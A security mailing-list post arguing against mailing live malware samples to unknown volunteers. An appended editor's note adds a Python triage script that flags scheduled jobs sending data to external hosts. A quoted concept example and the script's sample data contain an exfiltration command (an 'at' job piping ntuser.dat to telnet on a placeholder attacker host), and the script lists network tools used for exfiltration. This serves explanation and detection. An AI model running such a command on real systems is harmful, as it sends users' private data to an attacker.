From: nick at virus-l.demon.co.uk (Nick FitzGerald)
Subject: win2kup2date.exe ?

James Tucker to Harlan Carvey to me to :

> > > > > ...  If you want to email me a copy of it, I'll
> > > > > rip it apart and see what can be seen.
> > > >
> > > > And world plus dog should entrust you with such
> > > > material because???
> > > ... most viruses, trojans and malware do not store
> > > copies of stolen
> > > data in their executables. Furthermore the file size
> > > is very small.
> > 
> > Interesting answer, but completely non sequitur.  Nick
> > asked why this person should be trusted with a live
> > bit of malware, and your response is that it's not
> > very big???  What does that have to do with anything?
> 
> Malware and viruses are VERY readily available in many places across
> the internet. Therefore this point should be of no concern.  ...

It feels good when you stop hitting your head against the door too, and 
there are very many doors readily available for you to hit your head 
against.  Now, I don't know James, but I'd say it is a fair bet he 
doesn't hit his head against every door he sees just so he can enjoy 
the feeling when he stops hitting his head against each specific door.

Look, fool -- just because samples of some malware are easily accessible 
to you does not mean it is a good idea to encourage others to liberally 
spray copies of probably-new-and-undetected-by-many-scanners malware 
around willy nilly.  Such encouragement is ethically dubious, at 
best...

> ...  The only
> other concern which may be important is the possibility that the
> binary is carrying data from the infected system; it was this that I
> was referring to. Please accept my apology for not making this clearer.

And that was all but irrelevant to my concerns.  It is a possibility, 
and all the more reason to be sure that you really are sending your 
suspect files to a "true professional" but almost by definition, some 
arbitrary twit popping up in a mailing list or newsgroup saying "email 
me a copy of it, I'll rip it apart and see what can be seen" is _NOT_ 
such a person.  (And, if you look at the website at the domain of his 
preferred address for receiving "suspect" files, you have to question 
even further the suitability of this person...)

> > > > > P.S. Send it to [...] - it's my "catch all" for
> > > > > virus/unknown files. Just be sure to ZIP it up
> > > > > or else the web host
> > > > > won't let it through. Otherwise I have disabled
> > > > > all checks/scan.
> > > > > Downloads directly to a secured Linux box.
> > > >
> > > > That's all very nice, but alone, far from the
> > > > makings of someone to
> > > > entrust arbitrary, suspected malware samples to.
> > >
> > > "Entrust", just what exactly are you thinking you
> > > might be giving away?
> > 
> > Well, it's pretty obvious...a live bit of malware.
> > It's really pretty obvious what Nick's getting
> > at...why send this malware to some arbitrary person?
> > Who's to say that he's going to use it as he says, and
> > not send it back out to someone else?
> 
> To what end? It would be much more useful to an attacker to go and
> collect and customise one of the many readily available trojans on the
> internet, rather than spreading malware which they have no control
> over. IMHO your concern is closer to cynicism than practical reality.

Without knowing what the malware in question was or the skills of the 
recipient (assuming, for a moment, that they may actually have had bad 
intentions), you cannot even begin to decide what is easier for them.  
Also, studying something that turned out to be entirely new may give 
someone with ill intent a better idea of how to beat the odds with 
their next release.

But of course, that doesn't matter because the Internet is full of 
nasties so a few more makes no difference, eh James?

Have you hit your head against that door just over to your right 
recently?  A few really hard thwacks will be especially satisfying...

<<snip Virus Total stuff>>
> > > Samples of non-data carrying viruses or
> > > trojans are of
> > > little use to anyone other than Anti-Virus firms, as
> > > it is easy to
> > > collect raw source for most if one is so inclined.

Malware source code is all but useless to the AV industry.  It has to 
detect the actual code that ends up in actual malware which mostly 
means the binary output of compilation and linking.  Having the source 
may help one work out a few wrinkles that the reverse engineering 
analysis did not resolve (usually because the time/effort/payoff 
estimates suggested it was not worthwhile).  Such code is especially 
useful to the wannabe virus writer though, and almost never to 
professional AV researchers as, in the cases where source is released, 
it usually is not released until well after the AV'ers have analysed 
actual samples, added detection (and removal, etc) to their products 
and long since moved on.

I guess your inability to comprehend this before writing the drivel 
above tells us even more about the value of your opinions about the 
desirability of sending arbitrary suspect code to arbitrary bozos that 
pop up on mailing lists...

Oh look behind you -- there's another door...

> > Really?  Are you able to do so?  I would submit that
> > many with malicious intent don't know the sites and
> > sources you seem to be aware of, and will actually ask
> > for the binary...for the purpose of releasing it
> > against someone else.  Non-data carrying or otherwise,
> > it doesn't matter.  I received several IMs just this
> > weekend in which I was asked for running viruses.
> 
> Well, the same lack of trust may be given to you.  ...

Not at all.

Your inability again to comprehend what has been said shows your severe 
lack of relevant experience.  Very, very many folk of ill-intent 
approach people who publicly discuss malware (such as in this list), 
asking for code "to get back at my cheating girlfriend", etc, etc, etc. 
In fact, it's something of an occupational hazard.  For all we know, 
the chap my original message in this sub-thread was addressed to may 
just be too stupid to come up with anything better than soliciting for 
samples in an open mailing list where folk often ask questions such as 
"What does qwertyuiop.exe do?".

> ...  In order to find a
> balance between proving my point and not providing you with up to date
> info, I will provide you with this [...] site as an
> example, which is not carrying any modern sources at this time. You
> can find these easily by trawling security sites of high standards,
> they have outbound links to such sites. 

You have that backwards.

In general, the more such links a security site has, the lower its 
standard.  Posting links to live malicious code is somewhere between 
grossly irresponsible and criminally negligent.  Your "praise" of the 
practice tells us something about your mindset (though maybe it's being 
unhinged by all those doors?).

> ...  Google is rarely your friend
> in this regard, which may be why you are not aware of the high
> numeracy of such sites on the internet. Needless to say that this lack
> of awareness is possibly a good thing for most people (read: reduces
> script-kiddie access to such data).

At least here we agree on something...

<<snip more Virus Total stuff>>
> > > If there are viruses which commonly copy target
> > > system data, or
> > > sensitive data into their binaries at the present
> > > time (I imagine the
> > > mention of this deception may well spring at least
> > > one such virus)
> > > then I apologise that I am not aware of it.
> > 
> > Does it matter exactly what the malicious code does?
> 
> In this case the deception could be very serious as capturing the
> password details of a security professional is arguably more
> "interesting" and might (possibly) be more valuable to an attacker.
> This would be a good deceptive method of doing so.
> 
> As to whether generically it matters what a virus does, no, of course
> if a virus is defined as being such, it is malicious and should be
> removed anyway.

I think Harlan's (rather obvious) point was that it does not matter 
what it does as it is irresponsible to distribute malicious code willy 
nilly regardless of how bad or relatively benign it is.

> Sometimes it is important to know its functionality, as what if it had
> secretly run a  command like:
> at 18:30 "echo ntuser.dat | telnet haxorsite.com:1337"
> 
> The antivirus program would remove the virus, but your registry data
> would still get sent to the hacker site as this data is not illegal in
> the system. Before anyone has a go at me over access to ntuser.dat /
> timing issues / whatever, this is concept example only; use your heads
> please.

And the OP may benefit from discovering that and trying to run a DNS 
spoof of haxorsite.com against the sender's domain...

It all comes back to my question "And world plus dog should entrust 
[OP] with such material because???".

> > > There is always no need for aggressive statement of
> > > suspicion, which you are close to here.
> > > While I understand aggression due to anger, I
> > > am concerned that one should not get angry at
> > > someone offering them a
> > > service merely because one is suspicious of them.
> > > What if the offer of help is entirely genuine?
> > 
> > I think that you're entirely missing the point, as
> > I've already pointed out.
> 
> I apologise that this message of mine was not as clear as it should
> have been. Thank you for pointing it out to me.

And you missed the point of what you perceived as my anger -- that's 
just one of my common posting styles.  You may see it as anger, but 
those that know better see it as the sharper side of my "here comes 
another one" attitude, honed over many, many years more experience of 
dealing with fools than is healthy (at least for the new fools that 
come along every day).

Quick -- around the corner to your left, there's another door...


Regards,

Nick FitzGerald
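Editor's note, added here and not part of Nick FitzGerald's message or of the thread: James Tucker's quoted concept example above (a scheduled `at` job that pipes data to telnet and survives the scanner removing the dropper) is the kind of leftover persistence an analyst should look for once a binary has been cleaned up. The Python below is an illustration written for this page, not code from the thread. It parses constructed output in the shape of `schtasks /query /fo CSV /v` (the sample rows, host names, task names and times are invented, and the column names are assumed to match what schtasks prints; a parser keyed on column names copes with the many extra columns the real output carries) and flags jobs whose command line pairs a network client with a host outside an allowlist.

```python
import csv
import io
import re

# Constructed sample in the shape of `schtasks /query /fo CSV /v` output,
# trimmed to a few columns. Hosts, task names and times are invented; the
# second command reuses the concept example quoted in the thread.
SAMPLE_SCHTASKS_CSV = '''\
"HostName","TaskName","Next Run Time","Status","Task To Run","Run As User"
"WS01","\\Microsoft\\Windows\\Defrag\\ScheduledDefrag","N/A","Ready","%windir%\\system32\\defrag.exe -c -h -k -g","SYSTEM"
"WS01","\\At1","18:30:00, 27/09/2003","Ready","cmd /c echo ntuser.dat | telnet haxorsite.com:1337","SYSTEM"
"WS01","\\Backup","02:00:00, 28/09/2003","Ready","C:\\Tools\\backup.exe --target \\\\fileserver\\backups","backup"
'''

# Command-line network clients commonly abused to push data off a host.
NETWORK_CLIENTS = re.compile(
    r'\b(telnet|nc|ncat|netcat|ftp|tftp|curl|wget|certutil|bitsadmin|powershell)\b',
    re.I)

# Dotted host names or IPv4 literals that stand on their own (not part of a
# path such as system32\defrag.exe).
HOST_RE = re.compile(
    r'(?<![\w.\\/-])((?:\d{1,3}\.){3}\d{1,3}|[a-z0-9-]+(?:\.[a-z0-9-]+)+)(?![\w-])',
    re.I)

# Dotted tokens ending in these are file names, not hosts (ntuser.dat above).
FILE_EXTENSIONS = {"exe", "dll", "dat", "bat", "cmd", "txt", "log", "ps1",
                   "vbs", "sys", "ini"}


def _looks_like_host(token):
    return token.rsplit(".", 1)[-1].lower() not in FILE_EXTENSIONS


def find_scheduled_exfil(csv_text, internal_hosts=frozenset()):
    """Return scheduled jobs whose command pairs a network client with a host
    that is not on the internal allowlist. This is a triage heuristic: it
    selects candidates for an analyst, it does not prove exfiltration."""
    internal = {h.lower() for h in internal_hosts}
    flagged = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        command = row.get("Task To Run", "")
        tools = sorted({t.lower() for t in NETWORK_CLIENTS.findall(command)})
        hosts = [h for h in HOST_RE.findall(command)
                 if _looks_like_host(h) and h.lower() not in internal]
        # Requiring both a client and an external host keeps legitimate jobs
        # (defrag, a backup to an internal share) out of the report.
        if tools and hosts:
            flagged.append({
                "task": row.get("TaskName", ""),
                "next_run": row.get("Next Run Time", ""),
                "tools": tools,
                "hosts": hosts,
                "command": command,
            })
    return flagged


if __name__ == "__main__":
    for job in find_scheduled_exfil(SAMPLE_SCHTASKS_CSV,
                                    internal_hosts={"fileserver"}):
        print(f'{job["task"]} at {job["next_run"]}: '
              f'{job["tools"]} -> {job["hosts"]}')
        print(f'    {job["command"]}')
```

On a 2003-era host the `at` command lists jobs in a fixed-width table rather than CSV, so the reader would swap the parser while keeping the same pairing rule; the defrag and backup rows are there to show why a client alone, or a host alone, is not enough to raise an alert.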